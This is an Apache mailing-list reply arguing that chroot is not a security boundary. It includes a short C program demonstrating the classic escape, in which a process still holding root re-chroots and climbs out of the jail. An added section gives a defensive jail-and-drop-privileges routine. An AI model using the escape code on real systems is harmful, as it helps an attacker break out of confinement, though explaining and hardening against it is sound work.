> -----Original Message-----
> From: Colm MacCarthaigh [mailto:[EMAIL PROTECTED]
> Sent: Thursday, 24 January 2008 13:16
> To: [email protected]
> Subject: Re: High security
>
> On Thu, Jan 24, 2008 at 01:10:23PM +0100, Nick Gearls wrote:
> > You specify one directive, and the only thing you have to put in the
> > jail is your htdocs and logs directories; all other files (conf,
> > modules, httpd, libraries, etc.) are outside of the jail. This is really
> > top security - it's almost impossible to find something to hack.
>
> Well don't kid yourself, it makes privilege escalation by certain routes
> much harder, but it's not even close to almost impossible. There are
> many forms of IPC available between the children and the root-level
> Apache process anyway, and if you manage to exploit that it's game over
> anyway (including breaking out of the jail).

Yep. chroot was never designed to be a security feature. It can make
things more difficult to leave a jailed area. See also
http://kerneltrap.org/Linux/Abusing_chroot or have a look at

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    FILE *file;

    /* Enter the jail and write a file inside it. */
    chroot("/tmp/zw/blah1");
    chdir("/");
    file = fopen("blah1", "w");
    fprintf(file, "Hello\n");
    fclose(file);

    /* Still root: chroot again without changing the working directory. */
    mkdir("foo", 0755);   /* 0755 octal == 493 decimal */
    chroot("foo");
    chdir("..");
    chdir("blah2");
    file = fopen("blah2", "w");
    fprintf(file, "Hello\n");
    fclose(file);

    return 0;
}

which allows you to escape the chroot of /tmp/zw/blah1 if you are still
root at the point of time mkdir is executed and write a file to
/tmp/zw/blah2

Regards

Rüdiger
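
The program above depends on the process still being root when it calls chroot() the second time. As an added example (not part of the original mail and not Apache's code), this is the usual order for entering a jail and then giving up root irreversibly, with a check that the drop took effect. The helper name jail_and_drop, the path /var/empty and uid/gid 65534 are assumptions.

```c
#define _DEFAULT_SOURCE          /* chroot(), setgroups() */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: enter `dir` as the new root, then give up root for good.
 * Returns 0 on success, -2 if asked to keep uid/gid 0, -1 on any syscall
 * failure (the caller must exit on failure: the process may be half-confined).
 */
int jail_and_drop(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return -2;               /* root inside a chroot can chroot() again */

    /* chdir first so the working directory is never left outside the jail. */
    if (chdir(dir) != 0 || chroot(".") != 0)
        return -1;

    /* Order matters: groups and gid must go while we are still root. */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;

    /* Verify the drop is irreversible; a saved uid of 0 would allow this. */
    if (setuid(0) == 0 || seteuid(0) == 0)
        return -1;
    /* Without root (CAP_SYS_CHROOT) a second chroot() must now fail. */
    if (chroot(".") == 0)
        return -1;
    return 0;
}

int main(int argc, char *argv[])
{
    const char *dir = argc > 1 ? argv[1] : "/var/empty";  /* assumed jail path */
    int rc = jail_and_drop(dir, 65534, 65534);            /* assumed "nobody" ids */
    if (rc != 0) {
        fprintf(stderr, "jail_and_drop(%s) failed: rc=%d errno=%d\n", dir, rc, errno);
        return 1;
    }
    puts("confined and unprivileged");
    return 0;
}
```

Directory file descriptors opened before the chroot() remain usable with fchdir(), so close them before calling the helper.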
